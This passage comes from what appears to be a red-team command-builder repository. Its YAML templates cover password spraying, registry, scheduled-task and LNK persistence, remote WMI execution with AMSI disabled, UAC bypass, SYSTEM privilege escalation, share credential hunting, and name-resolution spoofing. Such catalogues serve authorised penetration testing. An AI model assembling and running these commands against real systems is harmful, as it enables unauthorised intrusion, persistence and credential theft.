description: Domain user password 24 | template: "{0}" 25 | default: Password123 26 | optional: false 27 | 28 | 29 | sections: 30 | - name: Search domain user location with current context 31 | labels: ["Recon"] 32 | mitre: '' 33 | verb: '' 34 | required_flags: [SearchUser] 35 | optional_flags: [] 36 | 37 | - name: Search domain user location with supplied creds 38 | labels: ["Recon"] 39 | mitre: '' 40 | verb: '' 41 | required_flags: [SearchUser, Username, Password] 42 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpSpray.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/jnqpblc/SharpSpray 3 | name: SharpSpray 4 | languages: 5 | - name: EXE 6 | prefix: SharpSpray.exe 7 | 8 | params: 9 | - name: SpSeeds 10 | type: text 11 | description: A comma-separated list of passwords to as a seed to the internal list generator. 12 | template: "--Seeds {0}" 13 | default: Password,Welcome 14 | optional: true 15 | 16 | - name: SpPasswords 17 | type: text 18 | description: A comma-separated list of passwords to use instead of the internal list generator. 19 | template: "--Passwords {0}" 20 | default: ItsNotWinter!,P@ssw0rd 21 | optional: true 22 | 23 | - name: SpDelay 24 | type: text 25 | description: The delay time between guesses in millisecounds. 26 | template: "--Delay {0}" 27 | default: 300 28 | optional: true 29 | 30 | - name: SpSleep 31 | type: text 32 | description: The number of minutes to sleep between password cycles. 33 | template: "--Sleep {0}" 34 | default: 15 35 | optional: true 36 | 37 | sections: 38 | - name: Generic command 39 | labels: ["Passwords", "Lateral"] 40 | mitre: 'T1110.003' 41 | verb: '' 42 | required_flags: [] 43 | optional_flags: [SpSeeds, SpPasswords, SpDelay, SpSleep] 44 | 45 | - name: Password spray with automatic generated passwords with custom sleep 46 | labels: ["Passwords", "Lateral"] 47 | mitre: 'T1110.003' 48 | verb: '' 49 | required_flags: [SpSleep] 50 | optional_flags: [] 51 | 52 | - name: Password spray with predefined seeds for password generation with custom sleep 53 | labels: ["Passwords", "Lateral"] 54 | mitre: 'T1110.003' 55 | verb: '' 56 | required_flags: [SpSeeds, SpSleep] 57 | optional_flags: [] 58 | 59 | - name: Password spray with predefined password list with custom sleep 60 | labels: ["Passwords", "Lateral"] 61 | mitre: 'T1110.003' 62 | verb: '' 63 | required_flags: [SpPasswords, SpSleep] 64 | optional_flags: [] 65 | 66 | - name: Password spray with predefined password list with custom sleep and delay 67 | labels: ["Passwords", "Lateral"] 68 | mitre: 'T1110.003' 69 | verb: '' 70 | required_flags: [SpPasswords, SpSleep, SpDelay] 71 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpStay.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/0xthirteen/SharpStay 3 | name: SharpStay 4 | languages: 5 | - name: EXE 6 | prefix: SharpStay.exe 7 | 8 | params: 9 | - name: General 10 | type: label 11 | 12 | - name: action 13 | description: 14 | default: ListTaskNames 15 | template: "action={0}" 16 | type: select 17 | options: [ElevatedRegistryKey, UserRegistryKey, UserInitMprLogonScriptKey, ElevatedUserInitKey, ScheduledTask, ScheduledTaskAction, SchTaskCOMHijack, CreateService, WMIEventSub, JunctionFolder, NewLNK, BackdoorLNK, ListTaskNames, ListScheduledTasks, ListRunningServices, GetScheduledTaskCOMHandler] 18 | optional: false 19 | 20 | - name: command 21 | type: text 22 | description: desc 23 | template: "command=\"{0}\"" 24 | default: C:\Windows\temp\fun.exe 25 | optional: true 26 | 27 | - name: DllPath 28 | type: text 29 | description: desc 30 | template: "dllpath={0}" 31 | default: C:\windows\temp\fun.dll 32 | optional: true 33 | 34 | - name: Registry 35 | type: label 36 | 37 | - name: KeyName 38 | type: text 39 | description: Registry key name 40 | template: "keyname={0}" 41 | default: Debug 42 | optional: true 43 | 44 | - name: KeyPath 45 | type: text 46 | description: Registry key path 47 | template: "keypath={0}" 48 | default: HKCU:Software\Microsoft\Windows\CurrentVersion\Run 49 | optional: true 50 | selected: false 51 | 52 | - name: Task Scheduler 53 | type: label 54 | 55 | - name: taskname 56 | type: text 57 | description: desc 58 | template: "taskname={0}" 59 | default: TestTask 60 | optional: true 61 | selected: false 62 | 63 | - name: runasuser 64 | type: text 65 | description: desc 66 | template: "runasuser={0}" 67 | default: user1 68 | optional: true 69 | 70 | - name: triggertype 71 | type: text 72 | description: desc 73 | template: "triggertype={0}" 74 | default: logon 75 | optional: true 76 | 77 | - name: author 78 | type: text 79 | description: desc 80 | template: "author={0}" 81 | default: Microsoft Corp. 82 | optional: true 83 | 84 | - name: description 85 | type: text 86 | description: desc 87 | template: "description=\"{0}\"" 88 | default: Test Task 89 | optional: true 90 | 91 | - name: logonuser 92 | type: text 93 | description: desc 94 | template: "logonuser={0}" 95 | default: user1 96 | optional: true 97 | 98 | - name: folder 99 | type: text 100 | description: desc 101 | template: "folder=\"{0}\"" 102 | default: \\ 103 | optional: true 104 | 105 | - name: actionid 106 | type: text 107 | description: desc 108 | template: "actionid={0}" 109 | default: ExecAction 110 | optional: true 111 | 112 | - name: COM Hijack 113 | type: label 114 | 115 | - name: clsid 116 | type: text 117 | description: desc 118 | template: "clsid={0}" 119 | default: "{a47af52a-27f9-4426-bd2b-727050712db1}" 120 | optional: true 121 | 122 | - name: Service 123 | type: label 124 | 125 | - name: ServiceName 126 | type: text 127 | description: Service name 128 | template: "servicename={0}" 129 | default: TestService 130 | optional: true 131 | selected: false 132 | 133 | - name: WMI event 134 | type: label 135 | 136 | - name: eventname 137 | type: text 138 | description: desc 139 | template: "eventname={0}" 140 | default: Debugger 141 | optional: true 142 | 143 | - name: attime 144 | type: text 145 | description: desc 146 | template: "attime={0}" 147 | default: startup 148 | optional: true 149 | 150 | - name: Junction folder 151 | type: label 152 | 153 | - name: guid 154 | type: text 155 | description: desc 156 | template: "guid={0}" 157 | default: "{a47af52a-27f9-4426-bd2b-727050712db1}" 158 | optional: true 159 | 160 | - name: LNK 161 | type: label 162 | 163 | - name: filepath 164 | type: text 165 | description: desc 166 | template: "filepath=\"{0}\"" 167 | default: C:\users\admin\desktop 168 | optional: true 169 | 170 | - name: lnkname 171 | type: text 172 | description: desc 173 | template: "lnkname=\"{0}\"" 174 | default: Notepad.lnk 175 | optional: true 176 | 177 | - name: lnktarget 178 | type: text 179 | description: desc 180 | template: "lnktarget=\"{0}\"" 181 | default: C:\Windows\temp\file.exe 182 | optional: true 183 | 184 | - name: lnkicon 185 | type: text 186 | description: desc 187 | template: "lnkicon=\"{0}\"" 188 | default: C:\Windows\system32\notepad.exe 189 | optional: true 190 | 191 | - name: LnkPath 192 | type: text 193 | description: desc 194 | template: "lnkpath=\"{0}\"" 195 | default: C:\users\user\desktop\Excel.lnk 196 | optional: true 197 | 198 | - name: Flags 199 | type: label 200 | 201 | - name: cleanup 202 | type: flag 203 | description: desc 204 | value: cleanup=true 205 | optional: true 206 | selected: false 207 | 208 | sections: 209 | - name: Self create persistancy command 210 | labels: [Persistancy] 211 | mitre: '' 212 | verb: '' 213 | required_flags: [action] 214 | optional_flags: [command, DllPath, KeyName, KeyPath, taskname, runasuser, triggertype, author, description, logonuser, folder, actionid, clsid, ServiceName, eventname, attime, guid, filepath, lnkname, lnktarget, lnkicon, LnkPath, cleanup] 215 | 216 | - name: User registry 217 | labels: [Persistancy] 218 | mitre: '' 219 | verb: 'action=UserRegistryKey' 220 | required_flags: [keyname, keypath, command] 221 | optional_flags: [cleanup] 222 | 223 | - name: Elevated user registry 224 | labels: [] 225 | mitre: '' 226 | verb: 'action=ElevatedRegistryKey' 227 | required_flags: [keyname, keypath, command] 228 | optional_flags: [cleanup] 229 | 230 | - name: User logon script 231 | labels: [Persistancy] 232 | mitre: '' 233 | verb: 'action=UserInitMprLogonScriptKey' 234 | required_flags: [command] 235 | optional_flags: [] 236 | 237 | - name: Elevated user init key 238 | labels: [Persistancy] 239 | mitre: '' 240 | verb: 'action=ElevatedUserInitKey' 241 | required_flags: [command] 242 | optional_flags: [] 243 | 244 | - name: Scheduled Task 245 | labels: [Persistancy] 246 | mitre: '' 247 | verb: 'action=ScheduledTask' 248 | required_flags: [taskname, command, runasuser, triggertype, author, description, logonuser] 249 | optional_flags: [cleanup] 250 | 251 | - name: Scheduled Task action 252 | labels: [Persistancy] 253 | mitre: '' 254 | verb: 'action=ScheduledTask' 255 | required_flags: [taskname, command, folder, actionid] 256 | optional_flags: [cleanup] 257 | 258 | - name: Scheduled Task COM Hijack 259 | labels: [Persistancy] 260 | mitre: '' 261 | verb: 'action=SchTaskCOMHijack' 262 | required_flags: [clsid, dllpath] 263 | optional_flags: [cleanup] 264 | 265 | - name: Service creation 266 | labels: [Persistancy] 267 | mitre: '' 268 | verb: 'action=CreateService' 269 | required_flags: [servicename, command] 270 | optional_flags: [cleanup] 271 | 272 | - name: WMIEventSub 273 | labels: [Persistancy] 274 | mitre: '' 275 | verb: 'action=WMIEventSub' 276 | required_flags: [command, eventname, attime] 277 | optional_flags: [cleanup] 278 | 279 | - name: JunctionFolder 280 | labels: [Persistancy] 281 | mitre: '' 282 | verb: 'action=JunctionFolder' 283 | required_flags: [dllpath, guid] 284 | optional_flags: [cleanup] 285 | 286 | - name: New LNK 287 | labels: [Persistancy] 288 | mitre: '' 289 | verb: 'action=NewLNK' 290 | required_flags: [filepath, lnkname, lnktarget, lnkicon, ] 291 | optional_flags: [cleanup] 292 | 293 | - name: Backdoor LNK 294 | labels: [Persistancy] 295 | mitre: '' 296 | verb: 'action=BackdoorLNK' 297 | required_flags: [command, lnkpath] 298 | optional_flags: [cleanup] -------------------------------------------------------------------------------- /commands/SharpUp.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/SharpUp 3 | name: SharpUp 4 | languages: 5 | - name: EXE 6 | prefix: SharpUp.exe 7 | 8 | params: 9 | - name: Audit 10 | type: flag 11 | description: Specifies whether or not to enable audit mode 12 | value: audit 13 | optional: true 14 | selected: true 15 | 16 | - name: Check 17 | description: The individual vulnerability check to be ran 18 | default: ProcessDLLHijack 19 | template: "{0}" 20 | type: select 21 | options: [AlwaysInstallElevated, CachedGPPPassword, DomainGPPPassword, HijackablePaths, McAfeeSitelistFiles, ModifiableScheduledTask, ModifiableServiceBinaries, ModifiableServiceRegistryKeys, ModifiableServices, ProcessDLLHijack, RegistryAutoLogons, RegistryAutoruns, TokenPrivileges, UnattendedInstallFiles, UnquotedServicePath] 22 | optional: true 23 | selected: false 24 | 25 | sections: 26 | - name: Run vulnerability checks 27 | labels: [Recon, PrivEsc] 28 | mitre: '' 29 | verb: '' 30 | required_flags: [] 31 | optional_flags: [Audit, Check] -------------------------------------------------------------------------------- /commands/SharpWMI.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/SharpWMI 3 | name: SharpWMI 4 | languages: 5 | - name: EXE 6 | prefix: SharpWMI.exe 7 | 8 | params: 9 | - name: action 10 | description: Type of command to execute 11 | default: query 12 | template: "action={0}" 13 | type: select 14 | options: [query, loggedon, exec, executevbs, upload, firewall, ps, terminate, getenv, setenv, delenv, install] 15 | optional: false 16 | 17 | - name: VariableName 18 | type: text 19 | description: Variable Name 20 | template: "name={0}" 21 | default: PROCESSOR_ARCHITECTURE 22 | optional: true 23 | selected: false 24 | 25 | - name: VariableValue 26 | type: text 27 | description: Variable Value 28 | template: "value={0}" 29 | default: new_value 30 | optional: true 31 | selected: false 32 | 33 | - name: ComputerName 34 | type: text 35 | description: desc 36 | template: "computername={0}" 37 | default: localhost 38 | optional: true 39 | selected: true 40 | 41 | - name: query 42 | type: text 43 | description: WMI query 44 | template: "query=\"{0}\"" 45 | default: select * from win32_service 46 | optional: true 47 | selected: false 48 | 49 | - name: Process 50 | type: text 51 | description: Process name or PID 52 | template: "process={0}" 53 | default: agent.exe 54 | optional: true 55 | selected: false 56 | 57 | - name: command 58 | type: text 59 | description: Command to execute 60 | template: "command=\"{0} {CommandArgs}\"" 61 | default: whoami 62 | optional: true 63 | selected: false 64 | 65 | - name: CommandArgs 66 | type: text 67 | description: Command arguments 68 | template: "{0}" 69 | default: "" 70 | optional: true 71 | selected: false 72 | 73 | - name: namespace 74 | type: text 75 | description: WMI namespace to query 76 | template: "namespace=\"{0}\"" 77 | default: root\\SecurityCenter2 78 | optional: true 79 | selected: false 80 | 81 | - name: Username 82 | type: text 83 | description: desc 84 | template: "username=\"{0}\"" 85 | default: windomain\User1 86 | optional: true 87 | selected: false 88 | 89 | - name: Password 90 | type: text 91 | description: desc 92 | template: "password=\"{0}\"" 93 | default: Password123 94 | optional: true 95 | selected: false 96 | 97 | - name: script 98 | type: text 99 | description: VBS script to execute, script or path 100 | template: "script=\"{0}\"" 101 | default: CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\") 102 | optional: true 103 | selected: false 104 | 105 | - name: scriptb64 106 | type: text 107 | description: Base64 encoded VBS script to execute, script or path 108 | template: "scriptb64=\"{0}\"" 109 | default: myscript.vbs.b64 110 | optional: true 111 | selected: false 112 | 113 | - name: url 114 | type: text 115 | description: URL to script to execute within VBS 116 | template: "script=\"{0}\"" 117 | default: https://mydomain.io/location/script.vbs 118 | optional: true 119 | selected: false 120 | 121 | - name: trigger 122 | type: text 123 | description: Trigger in seconds 124 | template: "trigger={0}" 125 | default: 5 126 | optional: true 127 | selected: false 128 | 129 | - name: timeout 130 | type: text 131 | description: Timeout in seconds 132 | template: "timeout={0}" 133 | default: 10 134 | optional: true 135 | selected: false 136 | 137 | - name: DisableAmsi 138 | type: flag 139 | description: Disable AMSI 140 | value: amsi=disable 141 | optional: true 142 | selected: true 143 | 144 | - name: Result 145 | type: flag 146 | description: Display result 147 | value: result=true 148 | optional: true 149 | selected: true 150 | 151 | sections: 152 | - name: Self create WMI command 153 | labels: [WMI] 154 | mitre: '' 155 | verb: '' 156 | required_flags: [action] 157 | optional_flags: [ComputerName, query, Username, Password, command, CommandArgs, Process, VariableName, VariableValue, url, script, scriptb64, timeout, trigger, DisableAmsi, Result] 158 | 159 | - name: Query WMI 160 | labels: [WMI, Recon] 161 | mitre: '' 162 | verb: 'action=query' 163 | required_flags: [query] 164 | optional_flags: [namespace, Username, Password] 165 | 166 | - name: Remote system Logged On users enumeration 167 | labels: [WMI, Recon] 168 | mitre: '' 169 | verb: 'action=loggedon' 170 | required_flags: [ComputerName] 171 | optional_flags: [Username, Password] 172 | 173 | - name: Remote process creation 174 | labels: [WMI, Lateral] 175 | mitre: '' 176 | verb: 'action=exec' 177 | required_flags: [command] 178 | optional_flags: [ComputerName, DisableAmsi, Result, Username, Password] 179 | 180 | - name: List processes 181 | labels: [WMI, Recon] 182 | mitre: '' 183 | verb: 'action=ps' 184 | required_flags: [] 185 | optional_flags: [ComputerName, Username, Password] 186 | 187 | - name: Terminate process (first found) 188 | labels: [WMI] 189 | mitre: '' 190 | verb: 'action=terminate' 191 | required_flags: [Process] 192 | optional_flags: [ComputerName, Username, Password] 193 | 194 | - name: Get environment variables (all if name not given) 195 | labels: [WMI, Recon] 196 | mitre: '' 197 | verb: 'action=getenv' 198 | required_flags: [] 199 | optional_flags: [VariableName, ComputerName, Username, Password] 200 | 201 | - name: Set environment variable 202 | labels: [WMI] 203 | mitre: '' 204 | verb: 'action=setenv' 205 | required_flags: [VariableName, VariableValue] 206 | optional_flags: [ComputerName, Username, Password] 207 | 208 | - name: Delete an environment variable 209 | labels: [WMI] 210 | mitre: '' 211 | verb: 'action=delenv' 212 | required_flags: [VariableName] 213 | optional_flags: [ComputerName, Username, Password] 214 | 215 | - name: Install MSI file 216 | labels: [WMI, Lateral] 217 | mitre: '' 218 | verb: 'action=install' 219 | required_flags: [path] 220 | optional_flags: [ComputerName, DisableAmsi, Username, Password] 221 | 222 | - name: Execute VBS 223 | labels: [WMI, Lateral] 224 | mitre: '' 225 | verb: 'action=executevbs' 226 | required_flags: [] 227 | optional_flags: [script, scriptb64, url, command, trigger, timeout, Username, Password] -------------------------------------------------------------------------------- /commands/Snaffler.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/SnaffCon/Snaffler 3 | name: Snaffler 4 | languages: 5 | - name: EXE 6 | prefix: Snaffler.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "Snaffler.exe" -Arguments " 9 | params: 10 | 11 | - name: domain 12 | description: 'Domain to search for computers to search for shares on to search for files in' 13 | template: "-d {0}" 14 | optional: true 15 | selected: false 16 | type: text 17 | default: '' 18 | 19 | - name: domain controller 20 | description: 'Domain controller to query for the list of domain computers' 21 | template: "-c {0}" 22 | optional: true 23 | selected: false 24 | type: text 25 | default: '' 26 | 27 | - name: results to a file 28 | description: 'Enables outputting results to a file' 29 | template: "-o {0}" 30 | optional: true 31 | selected: false 32 | type: text 33 | default: '' 34 | 35 | - name: stdout 36 | description: 'Enables outputting results to stdout' 37 | template: "-s" 38 | optional: true 39 | selected: false 40 | type: flag 41 | default: '' 42 | 43 | - name: verbosity level 44 | description: 'Controls verbosity level' 45 | template: "-v {0}" 46 | optional: true 47 | selected: false 48 | type: select 49 | options: [ 50 | 'Trace', 51 | 'Degub', 52 | 'Info', 53 | 'Data ', 54 | ] 55 | default: 'Info' 56 | 57 | - name: output dir 58 | description: 'Enables and assigns an output dir for snaffler to automatically take a copy of any found files that it likes' 59 | template: "-m {0}" 60 | optional: true 61 | selected: false 62 | type: text 63 | default: '' 64 | 65 | - name: Maximum size of files 66 | description: 'Maximum size of files (in bytes)' 67 | template: "-l {0}" 68 | optional: true 69 | selected: false 70 | type: text 71 | default: '10000000' 72 | 73 | - name: Disables computer and share discovery 74 | description: 'Disables computer and share discovery - requires a path to a directory in which to perform file discovery' 75 | template: "-i {0}" 76 | optional: true 77 | selected: false 78 | type: text 79 | default: '' 80 | 81 | - name: Disables computer discovery 82 | description: 'Disables computer discovery - takes a comma-separated list of hosts to do share and file discovery on' 83 | template: "-n {0}" 84 | optional: true 85 | selected: false 86 | type: text 87 | default: '' 88 | 89 | - name: TSV-formats the output 90 | description: 'TSV-formats the output' 91 | template: "-y {0}" 92 | optional: true 93 | selected: false 94 | type: flag 95 | default: '' 96 | 97 | - name: skips the LAIM rules 98 | description: 'Skips the LAIM rules that will find less-interesting stuff' 99 | template: "-b {0}" 100 | optional: true 101 | selected: false 102 | type: select 103 | options: [ 104 | '1', 105 | '2', 106 | '3', 107 | ] 108 | 109 | - name: finding file shares via DFS 110 | description: 'Limits Snaffler to finding file shares via DFS' 111 | template: "-f" 112 | optional: true 113 | selected: false 114 | type: flag 115 | default: '' 116 | 117 | - name: file enumeration 118 | description: 'Skips file enumeration' 119 | template: "-a" 120 | optional: true 121 | selected: false 122 | type: flag 123 | default: '' 124 | 125 | - name: list account names from AD 126 | description: 'pull a list of account names from AD' 127 | template: "-u" 128 | optional: true 129 | selected: false 130 | type: flag 131 | default: '' 132 | 133 | - name: maximum file size 134 | description: 'The maximum size file (in bytes) to search inside for interesting strings' 135 | template: "-r {0}" 136 | optional: true 137 | selected: false 138 | type: text 139 | default: '500K' 140 | 141 | - name: bytes of context 142 | description: 'How many bytes of context either side of found strings in files to show' 143 | template: "-j {0}" 144 | optional: true 145 | selected: false 146 | type: text 147 | default: '' 148 | 149 | - name: config file path 150 | description: 'Path to a config file' 151 | template: "-z {0}" 152 | optional: true 153 | selected: false 154 | type: text 155 | default: '' 156 | 157 | - name: log type 158 | description: 'Type of log you would like to output' 159 | template: "-t {0}" 160 | optional: true 161 | selected: false 162 | type: select 163 | options: [ 164 | 'plain', 165 | 'json', 166 | ] 167 | default: '' 168 | 169 | - name: max threads 170 | description: 'Max number of threads to use (min 4)' 171 | template: "-x {0}" 172 | optional: true 173 | selected: false 174 | type: text 175 | default: '' 176 | 177 | - name: toml directory path 178 | description: 'Path to a directory full of .toml formatted rules. Snaffler will load all of these in place of the default ruleset' 179 | template: "-p {0}" 180 | optional: true 181 | selected: false 182 | type: text 183 | default: '' 184 | 185 | sections: 186 | 187 | - name: Basic 188 | labels: [] 189 | mitre: "" 190 | verb: '' 191 | required_flags: [] 192 | optional_flags: ["domain", "domain controller", "results to a file", "stdout", "verbosity level", "output dir", "Maximum size of files", "Disables computer and share discovery", "Disables computer discovery", "TSV-formats the output", "skips the LAIM rules", "finding file shares via DFS", "file enumeration", "list account names from AD", "maximum file size", "bytes of context", "config file path", "log type", "max threads", "toml directory path"] 193 | 194 | 195 | -------------------------------------------------------------------------------- /commands/SspiUacBypass.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/antonioCoco/SspiUacBypass 3 | name: SspiUacBypass 4 | languages: 5 | - name: EXE 6 | prefix: SspiUacBypass.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "SspiUacBypass.exe" -Arguments " 9 | 10 | params: 11 | - name: BinPath 12 | description: Executable path to launch with high integrity 13 | template: "{0}" 14 | default: "C:\\windows\\System32\\cmd.exe" 15 | type: text 16 | optional: true 17 | 18 | 19 | sections: 20 | - name: Launch process as SYSTEM 21 | labels: ["PeivEsc", "UAC"] 22 | mitre: '' 23 | verb: '' 24 | required_flags: [] 25 | optional_flags: [BinPath] 26 | -------------------------------------------------------------------------------- /commands/SweetPotato.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/CCob/SweetPotato 3 | name: SweetPotato 4 | languages: 5 | - name: EXE 6 | prefix: SweetPotato.exe 7 | 8 | params: 9 | - name: CLSID 10 | type: text 11 | description: CLSID, default BITS 12 | default: 4991D34B-80A1-4291-83B6-3328366B9097 13 | optional: true 14 | selected: false 15 | template: "-c {0}" 16 | 17 | - name: Method 18 | type: select 19 | description: Method 20 | default: Auto 21 | options: ["Auto", "User", "Thread"] 22 | optional: true 23 | selected: false 24 | template: "-m {0}" 25 | 26 | - name: Prog 27 | type: text 28 | description: Program to launch 29 | default: cmd.exe 30 | template: "-p {0}" 31 | optional: true 32 | selected: true 33 | 34 | - name: Args 35 | type: text 36 | description: Arguments for program (default null) 37 | default: 38 | template: "-a {0}" 39 | optional: true 40 | selected: false 41 | 42 | - name: Exploit 43 | type: select 44 | description: Exploit mode 45 | default: PrintSpoofer 46 | options: ["DCOM", "WinRM", "EfsRpc", "PrintSpoofer"] 47 | template: "-e {0}" 48 | optional: true 49 | selected: false 50 | 51 | - name: ListenPort 52 | type: text 53 | description: COM server listen port 54 | default: 6666 55 | template: "-l {0}" 56 | optional: true 57 | selected: false 58 | 59 | 60 | sections: 61 | - name: Privilege escalation from SA to SYSTEM 62 | labels: ["PrivEsc"] 63 | mitre: "" 64 | verb: "" 65 | required_flags: [] 66 | optional_flags: [CLSID, Method, Prog, Args, Exploit, ListenPort] 67 | -------------------------------------------------------------------------------- /commands/WebFinder.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Sygnia/webfinder 3 | name: WebFinder 4 | params: 5 | - name: Range 6 | description: Specify IP Range 7 | default: 10.0.1-254.1-254 8 | 9 | sections: 10 | - name: Scan for web pages in network 11 | labels: ['Recon', 'Web'] 12 | commands: 13 | - language: PS 14 | command: WebFinder.ps1 {{Range}} 15 | -------------------------------------------------------------------------------- /commands/WinPEAS.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS 3 | name: winPEAS 4 | languages: 5 | - name: EXE 6 | prefix: winpeas.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "winPEAS.exe" -Arguments " 9 | 10 | params: 11 | - name: SpecificCheck 12 | description: Select specific check to execute 13 | default: systeminfo 14 | template: "{0}" 15 | type: select 16 | options: [domain, systeminfo, userinfo, processinfo, servicesinfo, applicationsinfo, networkinfo, windowscreds, browserinfo, filesinfo, fileanalysis, eventsinfo] 17 | optional: true 18 | selected: false 19 | 20 | - name: OutFile 21 | type: text 22 | description: Log all output to file defined as logfile 23 | template: "-log={0}" 24 | default: out.txt 25 | optional: true 26 | selected: true 27 | 28 | - name: notcolor 29 | type: flag 30 | description: Do not color the output 31 | value: notcolor 32 | optional: true 33 | selected: true 34 | 35 | - name: searchpf 36 | type: text 37 | description: Search credentials via regex also in Program Files folders 38 | template: "searchpf {0}" 39 | default: Pass.* 40 | optional: true 41 | selected: false 42 | 43 | - name: wait 44 | type: flag 45 | description: Wait for user input between checks 46 | value: "wait" 47 | optional: true 48 | selected: false 49 | 50 | - name: debug 51 | type: flag 52 | description: Display debugging information - memory usage, method execution time 53 | value: "debug" 54 | optional: true 55 | selected: true 56 | 57 | - name: quiet 58 | type: flag 59 | description: Do not print banner 60 | value: "quiet" 61 | optional: true 62 | selected: true 63 | 64 | - name: lolbas 65 | type: flag 66 | description: Run additional LOLBAS check 67 | value: "-lolbas" 68 | optional: true 69 | selected: true 70 | 71 | - name: linpeas 72 | type: text 73 | description: desc 74 | template: "-linpeas={0}" 75 | default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh 76 | optional: true 77 | selected: false 78 | 79 | sections: 80 | - name: Execute WinPEAS 81 | labels: ["Recon"] 82 | mitre: "" 83 | verb: "" 84 | required_flags: [] 85 | optional_flags: [SpecificCheck, quiet, notcolor, searchpf, wait, debug, OutFile, lolbas, linpeas] -------------------------------------------------------------------------------- /commands/WindowsEnum.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/absolomb/WindowsEnum 3 | name: WindowsEnum 4 | languages: 5 | - name: PS 6 | prefix: '.\WindowsEnum.ps1' 7 | 8 | params: 9 | 10 | - name: extended 11 | type: flag 12 | description: 'Extended checks will search for config files, various interesting files, and passwords in files and the registry, etc. It will take some time so be patient' 13 | value: 'extended' 14 | optional: true 15 | selected: false 16 | 17 | sections: 18 | 19 | - name: Run checks for privilege escalation vectors, optionally extending checks to perform a thorough search of sensitive information 20 | labels: ['Recon', 'PrivEsc'] 21 | mitre: 'T1082' 22 | verb: '' 23 | required_flags: [] 24 | optional_flags: [extended] -------------------------------------------------------------------------------- /commands/nltest.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: 3 | name: nltest 4 | languages: 5 | - name: EXE 6 | prefix: nltest 7 | 8 | params: 9 | - name: Domain 10 | type: text 11 | description: Domain 12 | template: "{0}" 13 | default: example.local 14 | optional: false 15 | 16 | - name: nlServer 17 | type: text 18 | description: Specify server name 19 | template: "/SERVER:{0}" 20 | default: Server1 21 | optional: true 22 | 23 | - name: nlQuery 24 | type: flag 25 | description: Query netlogon service 26 | value: /QUERY 27 | optional: true 28 | selected: false 29 | - name: nlREPL 30 | type: flag 31 | description: Force partial sync on BDC 32 | value: /REPL 33 | optional: true 34 | selected: false 35 | - name: nlSync 36 | type: flag 37 | description: Force full sync on BDC 38 | value: /SYNC 39 | optional: true 40 | selected: false 41 | - name: nlPdcREPL 42 | type: flag 43 | description: Force UAS change message from PDC 44 | value: /PDC_REPL 45 | optional: true 46 | selected: false 47 | 48 | - name: nlSCQuery 49 | type: flag 50 | description: descQuery secure channel for on 51 | value: "/SC_QUERY:{Domain}" 52 | optional: true 53 | selected: false 54 | - name: nlSCReset 55 | type: flag 56 | description: Reset secure channel for on to 57 | value: "/SC_RESET:{Domain}" 58 | optional: true 59 | selected: false 60 | - name: nlSCVerify 61 | type: flag 62 | description: Verify secure channel for on 63 | value: "/SC_VERIFY:{Domain}" 64 | optional: true 65 | selected: false 66 | - name: nlDCList 67 | type: flag 68 | description: Get list of DC's for specified domain 69 | template: "/DCLIST:{Domain}" 70 | optional: true 71 | selected: false 72 | 73 | 74 | sections: 75 | - name: Self crafted command 76 | labels: [] 77 | mitre: '' 78 | verb: '' 79 | required_flags: [] 80 | optional_flags: [ 81 | nlServer, 82 | nlQuery, 83 | nlREPL, 84 | nlSync, 85 | nlPdcREPL, 86 | nlSCQuery, 87 | nlSCReset, 88 | nlSCVerify, 89 | nlDCList 90 | ] 91 | - name: Get DC list 92 | labels: ['Recon'] 93 | mitre: '' 94 | verb: '' 95 | required_flags: [nlDCList] 96 | optional_flags: [nlServer] 97 | -------------------------------------------------------------------------------- /commands/pretender.yaml: -------------------------------------------------------------------------------- 1 | projectLink: https://github.com/RedTeamPentesting/pretender 2 | name: pretender 3 | languages: 4 | - name: EXE 5 | prefix: pretender.exe 6 | params: 7 | # Section containing relevant parameters 8 | - name: interfaceString 9 | description: 'Interface to bind on, supports auto-detection by IPv4 or IPv6' 10 | template: "-i {0}" 11 | optional: false 12 | type: text 13 | default: '' 14 | 15 | - name: ip4Ip 16 | description: 'Relay IPv4 address with which queries are answered, supports auto-detection by interface or IPv6' 17 | template: "-4 {0}" 18 | optional: true 19 | selected: false 20 | type: text 21 | default: '' 22 | 23 | - name: ip6Ip 24 | description: 'Relay IPv6 address with which queries are answered, supports auto-detection by interface or IPv4' 25 | template: "-6 {0}" 26 | optional: true 27 | selected: false 28 | type: text 29 | default: '' 30 | 31 | - name: soaHostnameString 32 | description: 'Hostname for the SOA record (useful for Kerberos relaying)' 33 | template: "--soa-hostname {0}" 34 | optional: true 35 | selected: false 36 | type: text 37 | default: '' 38 | 39 | - name: spoofStrings 40 | description: 'Only spoof these domains, if domain starts with a dot, all subdomains with match (allowlist)' 41 | template: "--spoof {0}" 42 | optional: true 43 | selected: false 44 | type: text 45 | default: '' 46 | 47 | - name: dontSpoofStrings 48 | description: 'Do not spoof these domains, if domain starts with a dot, all subdomains with match (blocklist)' 49 | template: "--dont-spoof {0}" 50 | optional: true 51 | selected: false 52 | type: text 53 | default: '' 54 | 55 | - name: spoofForHosts 56 | description: 'Only spoof DHCPv6 and name resolution for these hosts (allowlist of IPs or hostnames)' 57 | template: "--spoof-for {0}" 58 | optional: true 59 | selected: false 60 | type: text 61 | default: '' 62 | 63 | - name: dontSpoofForHosts 64 | description: 'Do not spoof DHCPv6 and name resolution for these hosts (blocklist of IPs or hostnames)' 65 | template: 